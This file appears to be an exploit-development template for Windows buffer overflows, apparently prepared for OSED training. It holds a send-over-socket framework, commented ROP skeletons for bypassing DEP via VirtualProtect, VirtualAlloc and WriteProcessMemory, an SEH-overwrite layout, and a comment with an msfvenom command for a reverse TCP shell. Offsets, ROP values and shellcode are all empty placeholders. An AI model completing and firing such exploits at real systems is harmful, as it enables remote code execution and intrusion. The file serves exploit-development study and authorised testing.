exploit-template.py
#!/usr/bin/python3
import sys
import socket
sys.path.insert(0, '../../osed-scripts')
from utils import RopChain, sanity_check, get_connection
# Byte values that must not appear anywhere in the delivered buffer; the
# assembled chain is run through sanity_check() against this list.
bad_chars = [0x00, 0x0a, 0x0d, 0x2b, 0x25, 0x26, 0x3d]
def get_payload() -> bytes:
    """Return the shellcode stage that is appended after the ROP chain.

    The template ships with an empty stage; the generator command recorded
    below is the author's note on how it is meant to be produced, with the
    values in ``bad_chars`` excluded from the output.
    """
    # msfvenom -p windows/shell_reverse_tcp lhost=eth0 lport=54321 -b '\x0a\x0d\x2b\x25\x26\x3d\x00' -v shellcode -f python
    stage = b''
    return stage
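def get_rop_chain() -> bytes:
    """Assemble the exploit buffer: padding, ROP skeleton, NOP sled, shellcode.

    One of the commented-out call layouts below is meant to become
    ``skeleton``.  The template previously never assigned ``skeleton`` at
    all, so calling this function raised ``NameError`` before any byte was
    built; it now starts from an empty ``RopChain`` so the function runs end
    to end while the real values are still being filled in.  The finished
    buffer is checked with ``sanity_check`` against ``bad_chars``.

    Returns:
        The raw bytes of the assembled chain (``rop.chain``).
    """
    # BOOL VirtualProtect(
    # LPVOID lpAddress,
    # SIZE_T dwSize,
    # DWORD flNewProtect,
    # PDWORD lpflOldProtect
    # );
    #
    # skeleton = RopChain()
    # skeleton += 0x41414141 # VirtualProtect address
    # skeleton += 0x42424242 # shellcode return address to return to after VirtualProtect is called
    # skeleton += 0x43434343 # lpAddress (same as above)
    # skeleton += 0x44444444 # dwSize (size of shellcode, 0x300 or so)
    # skeleton += 0x45454545 # flNewProtect (0x40)
    # skeleton += 0x46464646 # lpflOldProtect (some writable memory address)
    # -------------------------
    # -------------------------
    # LPVOID VirtualAlloc(
    # LPVOID lpAddress,
    # SIZE_T dwSize,
    # DWORD flAllocationType,
    # DWORD flProtect
    # );
    #
    # skeleton = RopChain()
    # skeleton += 0x41414141 # VirtualAlloc address
    # skeleton += 0x42424242 # shellcode return address to return to after VirtualAlloc is called
    # skeleton += 0x43434343 # lpAddress (shellcode address)
    # skeleton += 0x44444444 # dwSize (0x1)
    # skeleton += 0x45454545 # flAllocationType (0x1000)
    # skeleton += 0x46464646 # flProtect (0x40)
    # -------------------------
    # -------------------------
    # BOOL WriteProcessMemory(
    # HANDLE hProcess,
    # LPVOID lpBaseAddress,
    # LPCVOID lpBuffer,
    # SIZE_T nSize,
    # SIZE_T *lpNumberOfBytesWritten
    # );
    #
    # skeleton = RopChain()
    # skeleton += 0x41414141 # WriteProcessMemory address
    # skeleton += 0x42424242 # shellcode return address to return to after WriteProcessMemory is called
    # skeleton += 0xffffffff # hProcess (pseudo Process handle)
    # skeleton += 0x44444444 # lpBaseAddress (Code cave address)
    # skeleton += 0x45454545 # lpBuffer (shellcode address)
    # skeleton += 0x46464646 # nSize (size of shellcode)
    # skeleton += 0x47474747 # lpNumberOfBytesWritten (writable memory address, i.e. !dh -a MODULE)
    # -------------------------
    # -------------------------
    ropnop = 0x0          # template placeholder; not referenced until a chain is written
    offset_to_eip = 0     # template placeholder
    # Template placeholder for one of the layouts above.  Without this
    # assignment the two uses below were unbound names.
    skeleton = RopChain()
    # Pad up to the saved return address, minus what the skeleton occupies.
    # With the template's zero offset the count is negative and bytes
    # multiplication yields b'' rather than raising.
    rop = RopChain(chain=b'A' * (offset_to_eip - len(skeleton)))
    rop += skeleton.chain
    rop += 0x0
    ############################
    # EAX =>
    # EBX =>
    # ECX =>
    # EDX =>
    # ESI =>
    # EDI =>
    # -------------------------
    # skeleton[0] = 0x41414141
    # skeleton[1] = 0x42424242
    # skeleton[2] = 0x43434343
    # skeleton[3] = 0x44444444
    # skeleton[4] = 0x45454545
    # skeleton[5] = 0x46464646
    ############################
    rop += b'\x90' * 20
    rop += get_payload()
    # Reject the buffer early if any forbidden byte slipped in.
    sanity_check(rop.chain, bad_chars)
    return rop.chain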
def get_seh_overwrite() -> bytes:
    """Return the SEH-overwrite layout: padding, nSEH, SEH, then filler.

    Both lengths are template placeholders (0).  A negative repeat count on
    ``bytes`` produces ``b''``, so with the defaults only the nSEH and SEH
    marker bytes come back.
    """
    total_len = 0
    offset_to_eip = 0
    nseh = b'B' * 4
    seh = b'C' * 4  # seh - ppr or similar
    head = b'A' * (offset_to_eip - 4) + nseh + seh
    filler = b'C' * (total_len - len(head))
    return head + filler
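def send_exploit(sock: socket.socket, buffer: bytes, read_response=False):
    """Deliver *buffer* over *sock* and optionally print one response chunk.

    Args:
        sock: A connected socket.
        buffer: The bytes to deliver.
        read_response: When true, block on a single ``recv(4096)`` and print
            whatever comes back.

    Raises:
        OSError: Propagated from the socket on send/recv failure.
    """
    # sendall() keeps writing until every byte is out; a plain send() may
    # deliver only a prefix of a large buffer, which would make the byte
    # count printed below wrong.
    sock.sendall(buffer)
    print(f'[+] sent {len(buffer)} bytes')
    if read_response:
        resp = sock.recv(4096)
        print('[*] response:')
        print(resp)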
def main():
    """Connect to the configured target and deliver the ROP-chain buffer."""
    target_host, target_port = '127.0.0.1', 111  # todo change ip/port
    conn = get_connection(target_host, target_port)
    send_exploit(conn, get_rop_chain())
# Script entry point; importing the module does not connect anywhere.
if __name__ == '__main__':
    main()